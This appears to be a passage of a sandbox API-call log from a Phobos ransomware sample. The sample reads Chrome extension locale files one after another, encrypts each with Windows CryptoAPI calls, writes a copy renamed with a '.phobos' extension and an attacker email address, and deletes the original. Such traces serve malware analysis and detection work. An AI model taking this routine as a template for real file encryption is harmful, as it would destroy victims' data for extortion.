1 [0149.666] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0149.666] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.666] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.666] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.666] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.666] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.666] CloseHandle (hObject=0x148) returned 1 [0149.667] CloseHandle (hObject=0x190) returned 1 [0149.667] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json")) returned 1 [0149.667] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.668] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=206) returned 1 [0149.668] CloseHandle (hObject=0x190) returned 1 [0149.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0149.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.668] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.669] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.669] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.669] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.669] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce, lpOverlapped=0x0) returned 1 [0149.750] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0149.750] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0149.751] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0149.751] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.751] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.751] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.751] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.752] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.752] CloseHandle (hObject=0x190) returned 1 [0149.752] CloseHandle (hObject=0x148) returned 1 [0149.752] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json")) returned 1 [0149.753] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.753] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=208) returned 1 [0149.753] CloseHandle (hObject=0x148) returned 1 [0149.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0149.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.753] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.754] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.754] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.754] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.754] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd0, lpOverlapped=0x0) returned 1 [0149.755] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.755] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.756] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0149.756] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.756] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.756] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.756] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.756] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.756] CloseHandle (hObject=0x148) returned 1 [0149.756] CloseHandle (hObject=0x190) returned 1 [0149.757] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json")) returned 1 [0149.757] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.758] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=213) returned 1 [0149.758] CloseHandle (hObject=0x190) returned 1 [0149.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json")) returned 0x2020 [0149.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.762] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.762] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.762] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.762] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.762] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd5, lpOverlapped=0x0) returned 1 [0149.763] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.763] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0149.764] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.764] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.764] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.764] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.764] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.764] CloseHandle (hObject=0x190) returned 1 [0149.764] CloseHandle (hObject=0x148) returned 1 [0149.764] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json")) returned 1 [0149.765] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.765] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=266) returned 1 [0149.765] CloseHandle (hObject=0x148) returned 1 [0149.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json")) returned 0x2020 [0149.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.766] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.766] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.766] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.766] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10a, lpOverlapped=0x0) returned 1 [0149.767] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0149.767] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0149.768] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0149.768] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.768] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.768] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.768] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.768] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.769] CloseHandle (hObject=0x148) returned 1 [0149.769] CloseHandle (hObject=0x190) returned 1 [0149.769] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json")) returned 1 [0149.770] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.770] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=221) returned 1 [0149.770] CloseHandle (hObject=0x190) returned 1 [0149.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 